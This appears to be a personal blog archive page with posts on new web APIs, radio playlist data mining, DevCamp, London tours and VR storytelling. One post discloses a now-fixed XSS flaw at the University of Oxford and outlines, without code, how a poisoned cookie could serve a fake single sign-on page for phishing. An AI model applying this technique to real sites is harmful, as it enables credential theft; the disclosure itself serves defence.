Tomorrow’s Web, Today

Maybe it’s because I was at Render Conf at the end of last month or perhaps it’s because Three Rings DevCamp – which always gets me inspired – was earlier this month, but I’ve been particularly excited lately to get the chance to play with some of the more “cutting edge” (or at least, relatively-new) web technologies that are appearing on the horizon. It feels like the Web is having a bit of a renaissance of development, spearheaded by the fact that it’s no longer Microsoft that are holding development back (but increasingly Apple) and, perhaps for the first time, the fact that the W3C are churning out standards “ahead” of where the browser vendors are managing to implement technical features, rather than simply reflecting what’s already happening in the world.

Ben Foxall at Render Conf 2017 discusses the accompanying JSOxford Hackathon.
Ben Foxall at Render Conf 2017 discusses the accompanying JSOxford Hackathon. Hey, who’s that near the top-right?

It seems to me that HTML5 may well be the final version of HTML. Rather than making grand new releases to the core technology, we’re now – at last! – in a position where it’s possible to iteratively add new techniques in a resilient, progressive manner. We don’t need “HTML6” to deliver us any particular new feature, because the modern web is more-modular and is capable of having additional features bolted on. We’re in a world where browser detection has been replaced with feature detection, to the extent that you can even do non-hacky feature detection in pure CSS, now, and this (thanks to the nature of the Web as a loosely-coupled, resilient platform) means that it’s genuinely possible to progressively-enhance content and get on board with each hot new technology that comes along, if you want, while still delivering content to users on older browsers.

And that’s the dream! A web of progressive-enhancement stays true to Sir Tim’s dream of universal interoperability while still moving forward technologically. I’ve no doubt that there’ll always be people who want to break the Web – even Google do it, sometimes – with single-page Javascript-only web apps, “app shell” websites, mobile-only or desktop-only experiences and “apps” that really ought to have been websites (and perhaps PWAs) to begin with… but the fact that the tools to make a genuinely “progressively-enhanced” web, and those tools are mainstream, is a big deal. If you don’t think we’re at that point yet, I invite you to watch Rachel Andrews‘ fantastic presentation, “Start Using CSS Grid Layout Today”.

Three Rings' developers hard at work at this year's DevCamp.
Three Rings’ developers hard at work at this year’s DevCamp.

Some of the things I’ve been playing with recently include:

Intersection Observers

Only really supported in Chrome, but there’s a great polyfill, the Intersection Observer API is one of those technologies that make you say “why didn’t we have that already?” It’s very simple: all an Intersection Observer does is to provide event hooks for target objects entering or leaving the viewport, without resorting to polling or hacky code on scroll event captures.

Intersection Observer example (animated GIF)

What’s it for? Well the single most-obvious use case is lazy-loading images, a-la Medium or Google Image Search: delivering users a placeholder image or a low-resolution copy until they scroll far enough for the image to come into view (or almost into view) and then downloading the full-resolution version and dynamically replacing it. My first foray into Intersection Observers was to take Medium’s approach and then improve it with a Service Worker in order to make it behave nicely even if the user’s Internet connection was unreliable, but I’ve since applied it to my Reddit browser plugin MegaMegaMonitor: rather than hammering the browser with Javascript the plugin now waits until relevant content enters the viewport before performing resource-intensive tasks.

Web Workers

I’d briefly played with Service Workers before and indeed we’re adding a Service Worker to the next version of Three Rings, which, in conjunction with a manifest.json and the service’s (ongoing) delivery over HTTPS (over H2, where available, since last year), technically makes it a Progressive Web App… and I’ve been looking for opportunities to make use of Service Workers elsewhere in my work, too… but my first dive in to Web Workers was in introducing one to the next upcoming version of MegaMegaMonitor.

MegaMegaMonitor v155a Lists feature
MegaMegaMonitor’s processor-intensive “Lists” feature sees the most benefit from Web Workers

Web Workers add true multithreading to Javascript, and in the case of MegaMegaMonitor this means the possibility of pushing the more-intensive work that the plugin has to do out of the main thread and into the background, allowing the user to enjoy an uninterrupted browsing experience while the heavy-lifting goes on in the background. Because I don’t control the domain on which this Web Worker runs (it’s reddit.com, of course!), I’ve also had the opportunity to play with Blobs, which provided a convenient way for me to inject Worker code onto somebody else’s website from within a userscript. This has also lead me to the discovery that it ought to be possible to implement userscripts that inject Service Workers onto websites, which could be used to mashup additional functionality into websites far in advance of that which is typically possible with a userscript… more on that if I get around to implementing such a thing.

Fetch

The final of the new technologies I’ve been playing with this month is the Fetch API. I’m not pulling any punches when I say that the Fetch API is exactly what XMLHttpRequests should have been from the very beginning. Understanding them properly has finally given me the confidence to stop using jQuery for the one thing for which I always seemed to have had to depend on it for – that is, simplifying Ajax requests! I mean, look at this elegant code:

fetch('posts.json')
.then(function(response) {
  return response.json();
})
.then(function(json) {
  console.log(json.something.otherThing);
});

Whether or not you’re a fan of Javascript, you’ve got to admit that that’s infinitely more readable than XMLHttpRequest hackery (at least, without the help of a heavyweight library like jQuery).

Other things I've been up to include Laser Duck Hunt, but that's another story.
Other things I’ve been up to include Laser Duck Hunt, but that’s another story.

So that’s some of the stuff I’ve been playing with lately: Intersection Observers, Web Workers, Blobs, and the Fetch API. And I feel all full of optimism on behalf of the Web.

× × × ×

What Does Jack FM Sound Like?

Those who know me well know that I’m a bit of a data nerd. Even when I don’t yet know what I’m going to do with some data yet, it feels sensible to start collecting it in a nice machine-readable format from the word go. Because you never know, right? That’s how I’m able to tell you how much gas and electricity our house used on average on any day in the last two and a half years (and how much off that was offset by our solar panels).

Daily energy usage at Dan's house for the last few years. Look at the gas peaks in the winters, when the central heating ramps up!
The red lumps are winters, when the central heating comes on and starts burning a stack of gas.

So it should perhaps come as no huge surprise that for the last six months I’ve been recording the identity of every piece of music played by my favourite local radio station, Jack FM (don’t worry: I didn’t do this by hand – I wrote a program to do it). At the time, I wasn’t sure whether there was any point to the exercise… in fact, I’m still not sure. But hey: I’ve got a log of the last 45,000 songs that the radio station played: I might as well do something with it. The Discogs API proved invaluable in automating the discovery of metadata relating to each song, such as the year of its release (I wasn’t going to do that by hand either!), and that gave me enough data to, for example, do this (click on any image to see a bigger version):

Jack FM: Decade Frequency by Hour
Decade frequency by hour: you’ve got a good chance of 80s music at any time, but lunchtime’s your best bet (or perhaps just after midnight). Note that times are in UTC+2 in this graph.

I almost expected a bigger variance by hour-of-day, but I guess that Jack isn’t in the habit of pandering to its demographics too heavily. I spotted the post-midnight point at which you get almost a plurality of music from 1990 or later, though: perhaps that’s when the young ‘uns who can still stay up that late are mostly listening to the radio? What about by day-of-week, then:

Jack FM: Decade Frequency by Day of Week
Even less in it by day of week… although 70s music fans should consider tuning in on Fridays, apparently, and 80s fans will be happiest on Sundays.

The chunks of “bonus 80s” shouldn’t be surprising, I suppose, given that the radio station advertises that that’s exactly what it does at those times. But still: it’s reassuring to know that when a radio station claims to play 80s music, you don’t just have to take their word for it (so long as their listeners include somebody as geeky as me).

It feels to me like every time I tune in they’re playing an INXS song. That can’t be a coincidence, right? Let’s find out:

Jack FM: Artist Frequency
One in every ten songs are by just ten artists (including INXS). One in every four are by just 34 artists.

Yup, there’s a heavy bias towards Guns ‘n’ Roses, Michael Jackson, Prince, Oasis, Bryan Adams, Madonna, INXS, Bon Jovi, Queen, and U2 (who collectively are responsible for over a tenth of all music played on Jack FM), and – to a lesser extent – towards Robert Palmer, Meatloaf, Blondie, Green Day, Texas, Whitesnake, the Pet Shop Boys, Billy Idol, Madness, Rainbow, Elton John, Bruce Springsteen, Aerosmith, Fleetwood Mac, Phil Collins, ZZ Top, AC/DC, Duran Duran, the Police, Simple Minds, Blur, David Bowie, Def Leppard, and REM: taken together, one in every four songs played on Jack FM is by one of these 34 artists.

Jack FM: Top 20
Amazingly, the most-played song on Jack FM (Alice Cooper’s “Poison”) is not by one of the most-played 34 artists.

I was interested to see that the “top 20 songs” played on Jack FM these last six months include several songs by artists who otherwise aren’t represented at all on the station. The most-played song is Alice Cooper’s Poison, but I’ve never recorded them playing any other Alice Cooper songs (boo!). The fifth-most-played song is Fight For Your Right, by the Beastie Boys, but that’s the only Beastie Boys song I’ve caught them playing. And the seventh-most-played – Roachford’s Cuddly Toy – is similarly the only Roachford song they ever put on.

Next I tried a Markov chain analysis. Markov chains are a mathematical tool that examines a sequence (in this case, a sequence of songs) and builds a map of “chains” of sequential songs, recording the frequency with which they follow one another – here’s a great explanation and playground. The same technique is used by “predictive text” features on your smartphone: it knows what word to suggest you type next based on the patterns of words you most-often type in sequence. And running some Markov chain analysis helped me find some really… interesting patterns in the playlists. For example, look at the similarities between what was played early in the afternoon of Wednesday 19 October and what was played 12 hours later, early in the morning of Thursday 20 October:

19 October 2016 20 October 2016
12:06:33 Kool & The Gang – Fresh Kool & The Gang – Fresh 00:13:56
12:10:35 Bruce Springsteen – Dancing In The Dark Bruce Springsteen – Dancing In The Dark 00:17:57
12:14:36 Maxi Priest – Close To You Maxi Priest – Close To You 00:21:59
12:22:38 Van Halen – Why Can’t This Be Love Van Halen – Why Can’t This Be Love 00:25:00
12:25:39 Beats International / Lindy – Dub Be Good To Me Beats International / Lindy – Dub Be Good To Me 00:29:01
12:29:40 Kasabian – Fire Kasabian – Fire 00:33:02
12:33:42 Talk Talk – It’s My Life Talk Talk – It’s My Life 00:38:04
12:41:44 Lenny Kravitz – Are You Gonna Go My Way Lenny Kravitz – Are You Gonna Go My Way 00:42:05
12:45:45 Shalamar – I Can Make You Feel Good Shalamar – I Can Make You Feel Good 00:45:06
12:49:47 4 Non Blondes – What’s Up 4 Non Blondes – What’s Up 00:50:07
12:55:49 Madness – Baggy Trousers Madness – Baggy Trousers 00:54:09
Eagle Eye Cherry – Save Tonight 00:56:09
Feeling – Love It When You Call 01:04:12
13:02:51 Fine Young Cannibals – Good Thing Fine Young Cannibals – Good Thing 01:10:14
13:06:54 Blur – There’s No Other Way Blur – There’s No Other Way 01:14:15
13:09:55 Pet Shop Boys – It’s A Sin Pet Shop Boys – It’s A Sin 01:17:16
13:14:56 Zutons – Valerie Zutons – Valerie 01:22:18
13:22:59 Cure – The Love Cats Cure – The Love Cats 01:26:19
13:27:01 Bryan Adams / Mel C – When You’re Gone Bryan Adams / Mel C – When You’re Gone 01:30:20
13:30:02 Depeche Mode – Personal Jesus Depeche Mode – Personal Jesus 01:33:21
13:34:03 Queen – Another One Bites The Dust Queen – Another One Bites The Dust 01:38:22
13:42:06 Shania Twain – That Don’t Impress Me Much Shania Twain – That Don’t Impress Me Much 01:42:23
13:45:07 ZZ Top – Gimme All Your Lovin’ ZZ Top – Gimme All Your Lovin’ 01:46:25
13:49:09 Abba – Mamma Mia Abba – Mamma Mia 01:50:26
13:53:10 Survivor – Eye Of The Tiger Survivor – Eye Of The Tiger 01:53:27
Scouting For Girls – Elvis Aint Dead 01:57:28
Verve – Lucky Man 02:00:29
Fleetwood Mac – Say You Love Me 02:05:30
14:03:13 Kiss – Crazy Crazy Nights Kiss – Crazy Crazy Nights 02:10:31
14:07:15 Lightning Seeds – Sense Lightning Seeds – Sense 02:14:33
14:11:16 Pretenders – Brass In Pocket Pretenders – Brass In Pocket 02:18:34
14:14:17 Elvis Presley / JXL – A Little Less Conversation Elvis Presley / JXL – A Little Less Conversation 02:21:35
14:22:19 U2 – Angel Of Harlem U2 – Angel Of Harlem 02:24:36
14:25:20 Trammps – Disco Inferno Trammps – Disco Inferno 02:28:37
14:29:22 Cast – Guiding Star Cast – Guiding Star 02:31:38
14:33:23 New Order – Blue Monday New Order – Blue Monday 02:36:39
14:41:26 Def Leppard – Let’s Get Rocked Def Leppard – Let’s Get Rocked 02:40:41
14:46:28 Phil Collins – Sussudio Phil Collins – Sussudio 02:45:42
14:50:30 Shawn Mullins – Lullaby Shawn Mullins – Lullaby 02:49:43
14:55:31 Stars On 45 – Stars On 45 Stars On 45 – Stars On 45 02:53:45
16:06:35 Dead Or Alive – You Spin Me Round Like A Record Dead Or Alive – You Spin Me Round Like A Record 03:00:47
16:09:36 Dire Straits – Walk Of Life Dire Straits – Walk Of Life 03:03:48
16:13:37 Keane – Everybody’s Changing Keane – Everybody’s Changing 03:07:49
16:17:39 Billy Idol – Rebel Yell Billy Idol – Rebel Yell 03:10:50
16:25:41 Stealers Wheel – Stuck In The Middle Stealers Wheel – Stuck In The Middle 03:14:51
16:28:42 Green Day – American Idiot Green Day – American Idiot 03:18:52
16:33:44 A-Ha – Take On Me A-Ha – Take On Me 03:21:53
16:36:45 Cranberries – Dreams Cranberries – Dreams 03:26:54
Elton John – Philadelphia Freedom 03:30:56
Inxs – Disappear 03:36:57
Kim Wilde – You Keep Me Hanging On 03:40:59
16:44:47 Living In A Box – Living In A Box
16:47:48 Status Quo – Rockin’ All Over The World Status Quo – Rockin’ All Over The World 03:45:00

The similarities between those playlists (which include a 20-songs-in-a-row streak!) surely can’t be coincidence… but they do go some way to explaining why listening to Jack FM sometimes gives me a feeling of déjà vu (along with, perhaps, the no-talk, all-jukebox format). Looking elsewhere in the data I found dozens of other similar occurances, though none that were both such long chains and in such close proximity to one another. What does it mean?

There are several possible explanations, including:

  • The exotic, e.g. they’re using Markov chains to control an auto-DJ, and so just sometimes it randomly chooses to follow a long chain that it “learned” from a real DJ.
  • The silly, e.g. Jack FM somehow knew that I was monitoring them in this way and are trying to troll me.
  • My favourite: these two are actually the same playlist, but with breaks interspersed differently. During the daytime, the breaks in the list are more-frequent and longer, which suggests: ad breaks! Advertisers are far more-likely to pay for spots during the mid-afternoon than they are in the middle of the night (the gap in the overnight playlist could well be a short ad or a jingle), which would explain why the two are different from one another!

But the question remains: why reuse playlists in close proximity at all? Even when the station operates autonomously, as it clearly does most of the time, it’d surely be easy enough to set up an auto-DJ using “smart random” (because truly random shuffles don’t sound random to humans) to get the same or a better effect.

Jack FM Style Guide
One of the things I love about Jack FM is how little they take seriously. Like their style guide.

Which leads to another interesting observation: Jack FM’s sister stations in Surrey and Hampshire also maintain a similar playlist most of the time… which means that they’re either synchronising their ad breaks (including their duration – I suspect this is the case) or else using filler jingles to line-up content with the beginnings and ends of songs. It’s a clever operation, clearly, but it’s not beyond black-box comprehension. More research is clearly needed. (And yes, I’m sure I could just call up and ask – they call me “Newcastle Dan” on the breakfast show – but that wouldn’t be even half as fun as the data mining is…)

× × × × × ×

A Suitable Blog

At a little over 590 thousand words and spanning 1,349 pages, Vikram Seth’s A Suitable Boy is almost-certainly among the top ten longest single-volume English-language novels. It’s pretty fucking huge.

A Suitable Boy, seen from the edge
I’ll stick with the Kindle edition: I fear that merely holding the paperback would be exhausting.

I only discovered A Suitable Boy this week (and haven’t read it – although there are some good reviews that give me an inclination to) when, on a whim, I decided to try to get a scale of how much I’d ever written on this blog and then decided I needed something tangible to use as a comparison. Because – give or take – that’s how much I’ve written here, too:

Graph showing cumulative words written on this blog, peaking at 593,457.
At 593,457 words, this blog wouldn’t fit into that book unless we printed it on the covers as well.

Of course, there’s some caveats that might make you feel that the total count should be lower:

  • It might include a few pieces of non-content code, here and there. I tried to strip them out for the calculation, but I wasn’t entirely successful.
  • It included some things which might be considered metadata, like image alt-text (on the other hand, sometimes I like to hide fun messages in my image alt-text, so perhaps they should be considered content).

On the other hand, there are a few reasons that it perhaps ought to be higher:

  • It doesn’t include any of the content “lost” during the July 2004 server failure, some of which (like this post about Orange) were later recovered but many of which (like this post about Christmas plans and upcoming exams) remain damaged. It also doesn’t include any of the lost content from the original 1998/1999 version of this blog, only the weird angsty-teen out-of-context surviving bits.
  • Post titles (which sometimes contain part of the content) and pages outside of blog posts are not included in the word count.
  • I’ve removed all pictures for the purpose of the word count. Tempting though it was to make each worth a thousand words, that’d amount to about another one and a half million words, which seemed a little excessive.
A delicious-looking BLT. Mmm, bacon.
Another reason for not counting images was that it was harder than you’d think to detect repeat use of images that I’ve used too many times. Like this one.

Of course, my blog doesn’t really have a plot like A Suitable Boy (might compare well to the even wordier Atlas Shrugged, though…): it’s a mixture of mostly autobiographical wittering interspersed with musings on technology and geekery and board games and magic and VR and stuff. I’m pretty sure that if I knew where my life would be now, 18 years ago (which is approximately when I first started blogging), I’d have, y’know, tried to tie it all together with an overarching theme and some character development or something.

Or perhaps throw in the odd plot twist or surprise: something with some drama to keep the reader occupied, rather than just using the web as a stream-of-conciousness diary of whatever it is I’m thinking about that week. I could mention, for example, that there’ll be another addition to our house later this year. You heard it here first (unless you already heard it from somewhere else first, in which case you heard it there first.)

Annabel sitting on her daddy's knee and looking at sonograph pictures of her future baby brother.
Brought up in a world of tiny, bright, UHD colour touchscreens, Annabel seemed slightly underwhelmed by the magic of a sonograph picture of her future baby brother.

Still: by the end of this post I’ll have hit a nice, easy-to-remember 594,000 words.

× × ×

Anatomy of Cookie XSS

A cross-site scripting vulnerability (shortened to XSS, because CSS already means other things) occurs when a website can be tricked into showing a visitor unsafe content that came from another site visitor. Typically when we talk about an XSS attack, we’re talking about tricking a website into sending Javascript code to the user: that Javascript code can then be used to steal cookies and credentials, vandalise content, and more.

Good web developers know to sanitise input – making anything given to their pages by a user safe before ever displaying it on a page – but even the best can forget quite how many things really are “user input”.

"Who Am I?" page provided by University of Oxford IT Services.
This page outputs a variety of your inputs right back at you.

Recently, I reported a vulnerability in a the University of Oxford’s IT Services‘ web pages that’s a great example of this.  The page (which isn’t accessible from the public Internet, and now fixed) is designed to help network users diagnose problems. When you connect to it, it tells you a lot of information about your connection: what browser you’re using, your reverse DNS lookup and IP address, etc.. The developer clearly understood that XSS was a risk, because if you pass a query string to the page, it’s escaped before it’s returned back to you. But unfortunately, the developer didn’t consider the fact that virtually anything given to you by the browser can’t be trusted.

My Perl program, injecting XSS code into the user's cookie and then redirecting them.
To demonstrate this vulnerability, I had the option of writing Perl or Javascript. For some reason, I chose Perl.

In this case, I noticed that the page would output any cookies that you had from the .ox.ac.uk domain, without escaping them. .ox.ac.uk cookies can be manipulated by anybody who has access to write pages on the domain, which – thanks to the users.ox.ac.uk webspace – means any staff or students at the University (or, in an escalation attack, anybody’s who’s already compromised the account of any staff member or student). The attacker can then set up a web page that sets up such a “poisoned” cookie and then redirects the user to the affected page and from there, do whatever they want. In my case, I experimented with showing a fake single sign-on login page, almost indistinguishable from the real thing (it even has a legitimate-looking .ox.ac.uk domain name served over a HTTPS connection, padlock and all). At this stage, a real attacker could use a spear phishing scam to trick users into clicking a link to their page and start stealing credentials.

A fake SSO login page, delivered from a legitimate-looking https URL.
The padlock, the HTTPS url, and the convincing form make this page look legitimate. But it’s actually spoofed.

I’m sure that I didn’t need to explain why XSS vulnerabilities are dangerous. But I wanted to remind you all that truly anything that comes from the user’s web browser, even if you think that you probably put it there yourself, can’t be trusted. When you’re defending against XSS attacks, your aim isn’t just to sanitise obvious user input like GET and POST parameters but also anything that comes from a browser header including cookies and referer headers, especially if your domain name carries websites managed by many different people. In an ideal world, Content Security Policy would mitigate all these kinds of attacks: but in our real world – sanitise those inputs!

× × ×

Underground and Overground in the City of London

Despite being only a short journey away (made even shorter by the new railway station that appeared near by house last year), I rarely find myself in London. But once in a while a week comes along when I feel like I’m there all the time.

British Rail branded poster from an abandoned tunnel under Euston Station, circa 1960s.
TODO: funny caption

On Friday of last week, Ruth, JTA and I took one of the London Transport Museum‘s Hidden London tours. Back in 2011 we took a tour of Aldwych Tube Station, probably the most well-known of the London Underground’s disused stations, and it was fantastic, so we were very excited to be returning for another of their events. This time around, we were visiting Euston Station.

Our tour group gathers around the corner from Euston Station.
Stylish hi-vis jackets for everybody!

But wait, you might-well say: Euston station isn’t hidden nor disused! And you’d be right. But Euston’s got a long and convoluted history, and it used to consist of not one but three stations: the mainline station and two independent underground stations run by competing operators. The stations all gradually got connected with tunnels, and then with a whole different set of tunnels as part of the redevelopment in advance of the station’s reopening in 1968. But to this day, there’s still a whole network of tunnels underneath Euston station, inaccessible to the public, that are either disused or else used only as storage, air vents, or cable runs.

Disused lift shaft under Euston Station.
This lift shaft used to transport passengers between what are now the Northern and Victoria lines. Now it’s just a big hole.

A particular highlight was getting to walk through the ventilation shaft that draws all of the hot air out of the Victoria Line platforms. When you stand and wait for your train you don’t tend to think about the network of tunnels that snake around the one you’re in, hidden just beyond the grills in the ceiling or through the doors at the end of the platforms. I shot a video (below) from the shaft, periodically looking down on the trains pulling in and out below us.

No sooner were we back than I was away again. Last Saturday, I made my way back to London to visit Twitter’s UK headquarters in Soho to help the fantastic Code First: Girls team to make some improvements to the way they organise and deliver their Javascript, Python and Ruby curricula. I first came across Code First: Girls through Beverley, one of Three Rings‘ volunteers who happens to work for them, and I’ve become a fan of their work. Unfortunatley my calendar’s too packed to be able to volunteer as one of their instructors (which I totally would if it weren’t for work, and study, and existing volunteering, and things), but I thought this would be a good opportunity to be helpful while I had a nominally-“spare” day.

The coffee lounge on the administration/marketing floor of Twitter's offices in Soho.
Twitter’s offices, by the way, are exactly as beautiful as you’d hope that they might be.

Our host tried to win me over on the merits of working for Twitter (they’re recruiting heavily in the UK, right now), and you know what – if I were inclined towards a commute as far as London (and I didn’t love the work I do so much) – I’d totally give that a go. And not just because I enjoyed telling an iPad what I wanted to drink and then having it dispensed minutes later by a magical automated hot-and-cold-running-drinks tap nearby.

Twitter's reception with its "tweet wall" sculpture.
I’m not sure I ‘get’ the idea of a sculpture of tweets, though. Wouldn’t a “live display” have been more-thematic?

And that’s not even all of it. This coming Thursday, I’m back in London again, this time to meet representatives from a couple of charities who’re looking at rolling out Three Rings. In short: having a direct line to London on my doorstep turns out to be pretty useful.

× × × × ×

recruit.ox.ac.uk Permalink Generator

If you’ve ever applied for a job with my employer, the University of Oxford, you’ll have come across recruit.ox.ac.uk, one of the most-frustrating websites in the world. Of its many problems, the biggest (in my mind) is that it makes it really hard to share or save the web address of a particular job listing. That’s because instead of using individual web addresses to correspond to individual jobs, like any sanely-designed system would, it uses Javascript hackery and black magic to undermine the way your web browser was designed to work (which is why, you’ll find, you can’t “open in new tab” properly either), and instead provides its own, inferior, interface.

Some day I might get around to writing e.g. a userscript and/or browser plugin that “fixes” the site – from a user’s perspective, at least. But for the time being, because this morning I needed to share via social media a link to a UX developer post we’ve just advertised, I’ve come up with a little bookmarklet to fix this single problem:

recruit.ox.ac.uk Permalink Generator

Drag the bookmarklet to your bookmarks toolbar, then - when on the recruit.ox.ac.uk site - click it to use it.

This tool makes it easy to get permalinks (web addresses you can save or share) for job listings on recruit.ox.ac.uk. It might be adaptable to make it work with other CoreHR-powered systems, if it turns out that this missing feature comes from the underlying software that powers the site: it could also form the basis of a future userscript that would automatically fix the site “on the fly”. Here’s how to use it:

  1. Drag the link below into your browser’s bookmarks (e.g. the bookmarks toolbar).

    recruit.ox.ac.uk permalink

  2. When you’re on a recruit.ox.ac.uk job page, click on the bookmark. A permalink will appear at the top of the page, for your convenience. If you’re using a modern browser, the permalink will also appear in the address bar.
  3. Copy the permalink and use it wherever you need it, e.g. to share the link to a job listing.

If you have any difficulty with it or want help adapting it for use with other CoreHR systems, give me a shout.

DevCamp – have we really been doing this for 7 years?

An annual tradition at Three Rings is DevCamp, an event that borrows from the “hackathon” concept and expands it to a week-long code-producing factory for the volunteers of the Three Rings development team. Motivating volunteers is a very different game to motivating paid employees: you can’t offer to pay them more for working harder nor threaten to stop paying them if they don’t work hard enough, so it’s necessary to tap in to whatever it is that drives them to be a volunteer, and help them get more of that out of their volunteering.

Table full of computers at DevCamp 2011.
This photo, from DevCamp 2011, is probably the only instance where I’ve had fewer monitors out than another developer.

At least part of what appeals to all of our developers is a sense of achievement – of producing something that has practical value – as well as of learning new things, applying what they’ve learned, and having a degree of control over the parts of the project they contribute most-directly to. Incidentally, these are the same things that motivate paid developers, too, if a Google search for studies on the subject is to believed. It’s just that employers are rarely able to willing to offer all of those things (and even if they can, you can’t use them to pay your mortgage), so they have to put money on the table too. With my team at Three Rings, I don’t have money to give them, so I have to make up for it with a surplus of those things that developers actually want.

A developer hides inside a handmade camera obscura to watch the solar eclipse at DevCamp 2015.
At the 2015 DevCamp, developers used the solar eclipse as an excuse for an impromptu teambuilding activity: making a camera obscura out of stuff we had lying about.

It seems strange to me in hindsight that for the last seven years I’ve spent a week of my year taking leave from my day job in order to work longer, harder, and unpaid for a voluntary project… but that I haven’t yet blogged about it. Over the same timescale I’ve spent about twice as long at DevCamp than I have, for example, skiing, yet I’ve managed to knock out several blog posts on that subject. Part of that might be borne out of the secretive nature of Three Rings, especially in its early days (when involvement with Three Rings pretty-much fingered you as being a Nightline volunteer, which was frowned upon), but nowadays we’ve got a couple of dozen volunteers with backgrounds in a variety of organisations: and many of those of us that ever were Nightliner volunteers have long since graduated and moved-on to other volunteering work besides.

DevCamp and DocsCamp 2016 volunteers play Betrayal at the House on the Hill
Semi-cooperative horror-themed board games by candlelight are a motivator for everybody, right?

Part of the motivation – one of the perks of being a Three Rings developer – for me at least, is DevCamp itself. Because it’s an opportunity to drop all of my “day job” stuff for a week, go to some beatiful far-flung corner of the country, and (between early-morning geocaching/hiking expeditions and late night drinking tomfoolery) get to spend long days contributing to something awesome. And hanging out with like-minded people while I do so. I like I good hackathon of any variety, but I love me some Three Rings DevCamp!

Geocache GC4EE6C, with accompanying caterpillar and mushroom
The geocaches near DevCamp 2016 were particularly fabulous, though. Like this one – GC4EE6C – part of an Alice In Wonderland-themed series.

So yeah: DevCamp is awesome. It’s more than a little different than those days back in 2003 when I wrote all the code and Kit worked hard at distracting me with facts about the laws of Hawaii – for the majority of DevCamp 2016 we had half a dozen developers plus two documentation writers in attendance! – but it’s still fundamentally about the same thing: producing a piece of software that helps about 25,000 volunteers do amazing things and make the world a better place. We’ve collectively given tens, maybe hundreds of thousands of hours of time in developing and supporting it, but that in turn has helped to streamline the organisation of about 16 million person-hours of other volunteering.

So that’s nice.

Developers marvel at one another's code, etc.
An end-of-day “Show & Tell” session at DevCamp 2016.

Oh, and I was delighted that one of my contributions this DevCamp was that I’ve finally gotten around to expanding the functionality of the “gender” property so that there are now more than three options. That’s almost more-exciting than the geocaches. Almost.

Edit: added a missing word in the sentence about how much time our volunteers had given, making it both more-believable and more-impressive.

× × × × ×

Immersive Storytelling – Thoughts on Virtual Reality, part 3

This is the (long-overdue) last in a three-part blog post about telling stories using virtual reality. Read all of the parts here.

For the first time in two decades, I’ve been playing with virtual reality. This time around, I’ve been using new and upcoming technologies like Google Cardboard and the Oculus Rift. I’m particularly interested in how these new experiences can be used as a storytelling medium by content creators, and the lessons we’ll learn about immersive storytelling by experimenting with them.

Annabel plays with a Google Cardboard with a Samsung Galaxy S6 Edge attached.
There are few user interfaces as simple as moving your own head. Even Annabel – who struggles with the idea that some screens aren’t touchscreens – manages.

It seems to me that the biggest questions that VR content creators will need to start thinking about as we collectively begin to explore this new (or newly-accessible) medium are:

How do we make intuitive user interfaces?

This question mostly relates to creators making “interactive” experiences. Superficially, VR gives user experience designers a running start because there’s little that’s as intuitive as “turning your head to look around” (and, in fact, trying the technology out on a toddler convinced me that it’s adults – who already have an anticipation of what a computer interface ought to be – who are the only ones who’ll find this challenging). On the other hand, most interactive experiences demand more user interaction than simply looking around, and therein lies the challenge. Using a keyboard while you’re wearing a headset is close to impossible (trust me, I’ve tried), although the augmented-reality approach of the Hololens and potentially even the front-facing webcam that’s been added to the HTC Vive PRE might be used to mitigate this. A gamepad is workable, but it’s slightly immersion-breaking in some experiences to hold your hands in a conventional “gamer pose”, as I discovered while playing my Gone Home hackalong: this was the major reason I switched to using a Wiimote.

A pair of Oculus Rift "touch" controllers.
All of the major VR manufacturers are working on single-handed controllers with spatial awareness and accessible buttons. Some also support haptic feedback so that you can “feel” UI components.

So far, I’ve seen a few attempts that don’t seem to work, though. The (otherwise) excellent educational solar system exploration tool Titans of Space makes players stare at on-screen buttons for a few seconds to “press” them, which is clunky and unintuitive: in the real world, we don’t press buttons with our eyes! I understand why they’ve done this: they’re ensuring that their software has the absolute minimum interface requirement that’s shared between the platforms that it supports, but that’s a concern too! If content creators plan to target two or more of the competing systems that will launch this year alone, will they have to make usability compromises?

There’s also the question of how we provide ancillary information to players: the long-established paradigms of “health in the bottom left, ammo in the bottom right” don’t work so obviously when they’re hidden in your peripheral vision. Games like Elite Dangerous have tackled this problem from their inception by making a virtualised “real” user interface comprised of the “screens” in the spaceship around you, but it’s an ongoing challenge for titles that target both VR and conventional platforms in future. Wareable made some great observations about these kinds of concerns, too.

How do we tell stories without forced visual framing?

In my previous blog post, I talked about a documentary that used 360° cameras to “place” the viewer among the protesters that formed the subject of the documentary. In order to provide some context and to reduce the disorientation experienced by “jumping” from location to location, the creator opted to insert “title slides” between scenes with text explaining what would be seen next. But title slides necessitate that the viewer is looking in a particular direction! In the case of this documentary and several other similar projects I’ve seen, the solution was to put the title in four places – at each of the four cardinal directions – so that no matter which way you were looking you’ll probably be able to find one. But title slides are only a small part of the picture.

Two gamers wearing Oculus Rift headsets.
Does anybody else see photos like this and get reminded of the pictures of hooded captives at interrogation camps?

Directors producing content – whether interactive or not – for virtual reality will have to think hard about the implications of the fact that their camera (whether a physical camera or – slightly easier and indeed more-controllable – a simulated camera in a 3D-rendered world) can look in any direction. Sets must be designed to be all-encompassing, which poses huge challenges for the traditional methods of producing film and television programmes. Characters’ exits and entrances must be through believable portals: they can’t simply walk off to the left and stop. And, of course, the content creator must find a way to get the audience’s attention when they need it: watching the first few minutes of Backstage with an Elite Ballerina, for example, puts you in a spacious dance studio with a spritely ballerina to follow… but there’s nothing to stop you looking the other way (perhaps by accident), and – if you do – you might miss some of the action or find it difficult to work out where you’re supposed to be looking. Expand that to a complex, busy scene like, say… the ballroom scene in Labyrinth… and you might find yourself feeling completely lost within a matter of minutes (of course, a feeling of being lost might be the emotional response that the director intends, and hey – VR is great for that!).

Sarah and Jareth dance in the ballroom scene of Labyrinth.
You’re looking the wrong way. Turn around, and you’ll see the best part of the movie.

The potential for VR in some kinds of stories is immense, though. How about a murder mystery story played out in front of you in a dollhouse (showing VR content “in minature” can help with the motion sickness some people feel if they’re “dragged” from scene to scene): you can move your head to peep in to any room and witness the conversations going on, but the murder itself happens during a power cut or otherwise out-of-sight and the surviving characters are left to deduce the clues. In such a (non-interactive) experience the spectator has the option to follow the action in whatever way they like, and perhaps even differently on different playthroughs, putting the focus on the rooms and characters and clues that interest them most… which might affect whether or not they agree with the detective’s assertions at the end…

What new storytelling mechanisms can this medium provide?

